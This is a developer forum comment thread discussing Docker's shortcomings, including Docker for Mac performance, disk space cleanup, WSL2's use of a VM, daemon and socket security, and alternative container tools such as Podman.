          Because it keeps around all of the images you use as well as the containers after they are stopped so you can resume them. there is a command that auto automatically removes all unused images and containers you can use.

          • mirimir 5 years ago

            True. But there are situations where things get ~corrupted, and it becomes ~impossible to recover without basically nuking everything. But then, I was running containers with resource limits and long-term storage. So I could have thousands of lightweight "VMs" per physical server.

      • wp381640 5 years ago

        those scripts are now built into docker with `docker system prune`

        • smudgymcscmudge 5 years ago

          “docker system prune” is a recipe for pegging my cpu for the next few hours.

          • aledalgrande 5 years ago

            It used to be, with docker for Mac v2 it became fast for me. Problem is I don't wanna be wiping out dozens of images, figure out which ones I wanna keep etc. I want a configuration setting saying "keep X versions" and the rest will automatically get pruned.

          • techntoke 5 years ago

            If that is the case then you likely have something misconfigured, or are running on seriously underpowered hardware or in a VM that needs more resources allocated to it.

        • semerda 5 years ago

          Little changed after I ran this script. My ~/Library/Containers/com.docker.docker/ is a whopping 64.01 GB.

          Running 'docker system prune' only recovers: Total reclaimed space: 1.986GB

          But when I check ~/Library/Containers/com.docker.docker/ for size after prune it still says 64.01 GB.

          Am I doing something wrong or is 'docker system prune' useless?

      • dawnerd 5 years ago

        The issue linked is that is doesn't actually reclaim the space - you either have to wipe it out or do that workaround mentioned to resize it manually.

  • devin 5 years ago

    Seriously. It's absolute trash. I don't even want to think about how much time I've lost waiting for startup and teardown operations.

    Edit: Before you downvote me too heavily, go give the issues list a thorough read. Some of the problems are quite bad. Perhaps I could have said it in a nicer, but really, it's bad, and it's been bad for a good long while now.

  • djsumdog 5 years ago

    I hate how the Docker team called it native. Docker for Mac/Windows still run in a hypervisor because so much of Docker is specific to Linux/cgroups. There was a FreeBSD port of Docker that attempted to implement a lot of the Docker API using zfs+jails but it went unmaintained and was never ported to the newer modular Docker implementation.

    You're always going to get that performance hit with the hypervisor layer there.

    • teraflop 5 years ago

      > Docker for Mac/Windows still run in a hypervisor because so much of Docker is specific to Linux/cgroups.

      As I understand it, that what you describe is true of Docker for Mac, but not Docker for Windows which uses Windows' built-in container support (analogous to cgroups).

      https://stefanscherer.github.io/how-to-run-lightweight-windo...

      • nitemice 5 years ago

        As far as I understand it, that only applies to Windows-based containers running on Win 10 Pro/Enterprise or Win Server 2016.

        • amanzi 5 years ago

          This is true. Linux containers still require the VM running in Hyper-V in the background.

    • charles_f 5 years ago

      Docker for Windows is coming to use the WSL2, beta is already out.

      • lojack 5 years ago

        WSL 2 itself uses a hypervisor though, so this is sort of a moot point.

        • addicted 5 years ago

          Is this correct? I thought the headline feature of WSL2 was that unlike WSL it didn't use the hypervisor.

          Edit: I looked it up. WSL2 continues to use a VM.

          https://devblogs.microsoft.com/commandline/announcing-wsl-2/

          • skissane 5 years ago

            > Is this correct? I thought the headline feature of WSL2 was that unlike WSL it didn't use the hypervisor.

            No, the headline feature of WSL2 is it uses a real Linux kernel under a hypervisor, as opposed to WSL1's approach of a kernel driver running inside the NT kernel which partially emulates the Linux syscall API.

            > Edit: I looked it up. WSL2 continues to use a VM.

            More accurately, WSL2 starts using a VM, whereas WSL1 didn't. WSL2 runs the Linux kernel inside a VM. WSL1 runs Linux processes under the NT kernel (albeit as a special type of lightweight process called a picoprocess), with an emulation layer to translate Linux syscalls into NT kernel calls.

          • Mister_Snuggles 5 years ago

            You've got it backwards.

            WSL was a translation layer between Linux and Windows, WSL2 uses Hyper-V (I believe with some special sauce to handle integration).

          • teppifk 5 years ago

            WSL2 doesn't continue to use a VM, it is new in that it uses a VM. WSL1 did not use a VM, it directly interfaced with the NT executive.

      • sigjuice 5 years ago

        Calling it “Docker for Windows” is still highly inappropriate and misleading. It is super confusing.

    • smudgymcscmudge 5 years ago

      I preferred the old mac solution where they didn’t try to hide the vm from you. It was much more straightforward.

      • jsmeaton 5 years ago

        I personally disagree. I hated the whole docker-machine rubbish and exporting of the env vars.

        That doesn't make the performance problems of docker-for-mac any less nasty though.

  • dawnerd 5 years ago

    I just recently switched to using vscode with the remote ssh plugin and setup an ubuntu vm on my windows machine and performance is like 100x better.

    Docker for mac is basically dead to me now, going to finish migrating my projects over to the VM and uninstall it from my laptop.

    • yoube 5 years ago

      Have you tried running the Vscode + Linux Subsystem + Docker on Windows stack? It's been pretty good so far (a good writeup on this is at https://nickjanetakis.com/blog/setting-up-docker-for-windows...)

      • nickjj 5 years ago

        Thanks for sharing that link, author here.

        Yeah I don't know why but on Windows the volume performance generally seems to be a lot better than Mac.

        I have nothing but good things to say even on 5 year old hardware. Massive web apps (including using webpack) are very very speedy with volumes with a number of different stacks (flask, rails, phoenix, webpack, node).

        I still use that set up years later and it's really solid.

  • EamonnMR 5 years ago

    For all of it's slowness, and constantly filling my hard drive with old builds because that's the workflow for some reason, it solves the real problem of MacOS constantly breaking packages. That alone makes it worth it.

    • james_s_tayler 5 years ago

      Yeah. I have to run docker system prune from time to time.

  • par 5 years ago

    Docker for Mac is a performance nightmare. It requires state of the art $3400 macbook pro to run properly, and even then still takes seconds (or 10s of seconds) to spin up, start local servers, etc. Build processes that would've run locally take 3-10x longer running on docker for mac. The whole thing can be quite frustrating.

  • month13 5 years ago

    Wondering if it's worthwhile just rolling my own vm and run whatever i want in there. I'd lose all the ability to bind to my host's ports, but would be able to control the daemon a bit better.

djsumdog 5 years ago

These are all pretty good points. I can understand why Docker allows any base layer OS, but they could have made their own packages or limited a single distro and it would be easier to check for outdated packages and security issues in containers.

The cgroups and Linux specific hooks keep Docker from being implemented natively anywhere else. The fact you have to share the entire Docker socket for containers to be able to control other containers, or that it's not trivial to run Docker-in-Docker, is terrible.

I did a similar writeup about the things I hate about container orchestration systems:

https://penguindreams.org/blog/my-love-hate-relationship-wit...

  • imiric 5 years ago

    > The fact you have to share the entire Docker socket for containers to be able to control other containers, or that it's not trivial to run Docker-in-Docker, is terrible.

    FWIW, if you enable the remote API, which, granted, isn't as trivial to do securely as it should be[1], then you can connect from any Docker client by simply setting the `DOCKER_HOST` env var and using the right TLS certs. This makes Docker-in-Docker much easier to manage, avoids the security issues of sharing the Unix socket, and works remotely of course.

    [1]: https://docs.docker.com/engine/security/https/

    • djsumdog 5 years ago

      I created an ansible role that does this for me:

      https://github.com/sumdog/bee2/blob/master/ansible/roles/doc...

      It creates client certs and copies them locally too, so I can connect to Docker remotely over a VPN. Still this doesn't solve the original problem I talked about. It's not about securely connecting to the daemon. Even if you connect securely, you still essentially have root access on the host machine.

      I've considered writing a proxy that restricts what commands can be forwarded on to the Docker host socket (e.g. allowing for container IPs x,y and z to restart containers, but not to create new ones or pull images). There doesn't seem to be fine grained security or roles built into the docker daemon itself.

      Running docker in a docker container would give you a throw-away docker to use for things like Jenkins, Gitlab-CI, and other build tools without giving it access directly to root on the host.

      • imiric 5 years ago

        > Even if you connect securely, you still essentially have root access on the host machine.

        Your original point was about the pain of sharing the Unix socket to control other containers, so that's why I brought up the API approach.

        It's been a while since I used Docker, but have you tried enabling user namespace remapping[1]? I remember it working as documented, and don't see why it wouldn't work remotely or DiD. There's also experimental rootless support since 19.03[2], maybe give that a try. Other than that, make sure you trust the images you run, or preferably, inspect every Dockerfile, ensure that the process runs as an unprivileged user, and build everything from scratch yourself.

        I agree with you that this is a major security issue, but we've known that since its introduction, and things seem to be improving, albeit slowly.

        Thankfully, nowadays there is other OCI-compatible tooling you can use and sidestep Docker altogether. Podman[3] is growing on me, mostly because of rootless support, though it's not without its issues and limitations.

        [1]: https://docs.docker.com/engine/security/userns-remap/

        [2]: https://github.com/moby/moby/blob/master/docs/rootless.md

        [3]: https://podman.io/

  • krferriter 5 years ago

    We were using Docker-in-Docker in our cluster to run user-defined containers, and something about it resulted in the outer container disk usage blowing up to like 20GiB per container. I think something due to the overlay filesystem driver. We were under a time constraint so we just grew all the host root filesystems, but it was pretty inconvenient and not inexpensive to do so. I have to assume this also had a drastic negative impact on storage I/O performance in the inner container as well.

    • geggam 5 years ago

      Docker in Docker feels like a root kit generator to me

alpb 5 years ago

Nearly all points (daemon-less runtimes, daemon-less builds) the author has mentioned has been addressed by open source ecosystem in smaller standalone projects that are available.

Docker provides a nice high-level layer for the end user on the developer machine. Its CLI is efficient, so are the builds when they're local, with a cache. I still use it on my dev machine despite being aware of the alternatives.

Anyone security-aware company using containers in production most likely go with non-Docker approaches. Some notable examples include runc, Podman, Buildah, img, ko, Bazel/distroless.

  • solipsism 5 years ago

    Distroless is not non-Docker, it's very much Docker.

    • alpb 5 years ago

      Please explain.

      You can build images using Bazel with distroless as the base image. Similarly I think Jib/ko use distroless images without needing a docker engine.

      • solipsism 5 years ago

        The thing you build is a Docker image.

        • alpb 5 years ago

          Technically an OCI image, and there’s nothing relevant that is mentioned in the original article in your argument, and you can run the resulting image without docker so I think at this point your argument sounds like random blabber, sorry.

jbergknoff 5 years ago

It's interesting to see the complaint about containers starting too slowly. I haven't seen much discussion about it before this article and this comment thread, but it's one of my biggest pain points with Docker. I know we can save some time by skipping some namespaces (e.g. `--net host`) but I've still never been able to get satisfyingly fast container execution in that way. (e.g. `time echo` -> 0.000s, `time docker run --rm alpine echo` -> 1.3s; come to think of it, this is even slower than it used to be)

Still, Docker is the best method that I've seen for distributing software, especially cross-platform. Not just for shipping a containerized web app to production, but also running dev tools (e.g. linters, compilers) and other desktop and CLI applications. I know some people run lots of stuff in containers (https://github.com/jessfraz/dockerfiles, probably the most prolific), but I think this is a largely underappreciated facet of Docker.

My team at work is heavily Mac while I'm on Linux. The dev workflows are identical on my machine, on their machines, and in Jenkins. Nobody has to have a snowflake setup, installing this or that version of Python, we're all just `docker run`ning the same image. It's great.

Unfortunately, Docker for Mac's IO performance is abysmal. If past performance is any indication of future results, that's never going to change. I'm constantly on the lookout for other ways to share tools cross-platform that don't involve Docker. Things like podman and binctr are exciting, and I've played with them, but I don't see them filling this niche.

atarian 5 years ago

I just want to be able to save a container binary to a USB drive and then run it from a different computer without having to install anything.

  • astockwell 5 years ago

    The first time I emailed a buddy a Go cross-compiled binary and he opened and it ran no problem (opsec aside), our worlds changed.

    • atarian 5 years ago

      This is exactly how I'd like containers to be as well.

  • TheChaplain 5 years ago

    I believe that already exist and is called "AppImage".

  • techntoke 5 years ago

    Installing Docker or another container runtime is easy. I'd suggest creating a portable OS that you can boot from USB, or creating a local registry. You may also want to consider just creating a script to bind mount the binaries.

  • lytedev 5 years ago

    There are a number of ways to get this kind of functionality. Can you expound on "different computer"?

    • juandazapata 5 years ago

      What part of "different computer" is confusing to you?

      • fwip 5 years ago

        How different, for one.

        Are they running the same OS? The same architecture? Do they have any software installed?

est 5 years ago

All I want is a process that can be frozen and copied to multiple servers.

start/stop is merely a state change.

  • soraminazuki 5 years ago

    You’d be much better off using a VM if you want snapshots. Process snapshots requires that you can:

    1. extract all kernel state related to the target process

    2. replicate the state on another machine

    Both of these are extremely complicated problems.

    The first problem is difficult because it’s nearly impossible to isolate all relevant state in the kernel. Process state is closely intertwined with the entire kernel state, making it all too easy to produce an incomplete snapshot that can break the system in all sorts of ways. Worse, things would get more complicated if multiple processes are involved.

    The second problem is just as hard if you consider external dependencies or different kernel versions. It might simply be impossible to recreate the process even if you did succeed in creating the perfect snapshot.

    Process snapshots are simply not worth the trouble.

  • ethagnawl 5 years ago

    This sounds a lot like the Smalltalk VM.

  • ehotinger 5 years ago

    That's quite an oversimplification of the problem, copying stack/heap/etc. Anyways, check out CRIU as a starting point.

    • e12e 5 years ago

      (and note that lxd/lxc allows migration based on it. Not sure about copying - I suspect you run into similar issues as fork - who owns the open file handles and other resources?)

  • lytedev 5 years ago

    This is interesting... May I ask why this is an important feature to you?

    • est 5 years ago

      If you think about it most "Service", web or rpc, can be scaled in this way.

broknbottle 5 years ago

switch to podman?

https://podman.io/

  • k__ 5 years ago

    I saw it can be used as a drop-in replacement.

    Does podman have better startup performance than docker?

    Using a docker to debug and it is a bit of a pain.

anordal 5 years ago

... then I suppose Selfdock is for you.

* Does not give or require root.

* Fast: Does not write to disk.

* Fast: Does not allocate memory.

* No daemon.

https://github.com/anordal/selfdock

  • aequitas 5 years ago

    > Give up the idea of data volume containers. Given that volumes are the way to go, no other filesystems in the container need to, or should be, writable.

    Interesting philosophy, it will pose some issues when replicating a Docker 'build' like system though. But that could be separated from the 'run' system with cached layers.

    edit: Btw, Docker also seems to support this: https://nickjanetakis.com/blog/docker-tip-55-creating-read-o.... Also allowing explicit creation of writable tmpfs mountpoints.

  • k__ 5 years ago

    I read podman can be simply aliased to docker and it works. Is this the case for selfdock too?

devmunchies 5 years ago

Do BSD jails solve these problems? The little i know of them, they are good at containerization but don't solve the distribution problem that docker containers do.

rotten 5 years ago

I'd like it to be more like git. Yes Docker has "push" and "pull", but I want branches, and automatic attach when I do a checkout, and rollback when I screw it up.

As a developer I'd like to be able to check out a docker image, work _in_ it, and merge it to master when I'm done. When my code is deployed, I'll know _exactly_ what is running.

Managing secrets and environments (so the container knows when it is in production instead of running on a developer's laptop) is important to get this to work well.

It feels like it is half way there already. I'm looking forward to when it is as straightforward as git for a developer to use. I'm not too worried about start up time - the biggest drawback to slow startup time is when you are running very sensitive autoscaling that is tearing down and spinning up new nodes very quickly. If you have that problem you may want to rethink your node size, hysteresis, and scaling thresholds.

peterwwillis 5 years ago

Containers Without Docker: https://dzone.com/articles/containers-with-out-docker

Dockerless: https://mkdev.me/en/posts/dockerless-part-1-which-tools-to-r... https://dzone.com/articles/dockerless-part-1-which-tools-to-...

What's funny is, Docker is only actually useful because of how many features it has, all its supported platforms, all its bloat. You won't ever be totally satisfied with any alternative because it takes so long to make something like Docker, and someone will always need that one extra feature.

mschuster91 5 years ago

> In fact, a global system daemon should not be needed.

You will need a daemon running as root to bind to ports below 1024.

In addition, in many cases you want a bind-mount onto your filesystem that also supports arbitrary UID/GID on files, which means you will need a root daemon. The problem is of course that anyone having access to the docker daemon can simply say "bind host / to container /mnt" and then can hijack /etc/sudoers for a privilege escalation on the host.

It's mutually exclusive to have usable containers and a system that is secure against privilege escalation by the users at least and (in case of docker-in-docker implemented by bind-mounting the Docker socket in the container) by anyone accessing the container and achieving RCE there.

bokieie 5 years ago

We tried to use LXC directly and realized that Docker simply does it all for us, and better.

tigroferoce 5 years ago

Beside technical considerations, the main point of Docker, to me, is its diffusion. Just like the actual physical containers it gets inspiration from, you can find Docker almost everywhere. It has become a Lingua Franca for devops, even in enterprise environments, and it will be very difficult to get rid of it.

CruzeDon 5 years ago

It's absolute trash

notyourday 5 years ago

Have you heard of this amazing thing called "a VM"? It is like docker but when you pee at the wall it always splashes back right at you so you quickly learn that you never want to pee at the wall.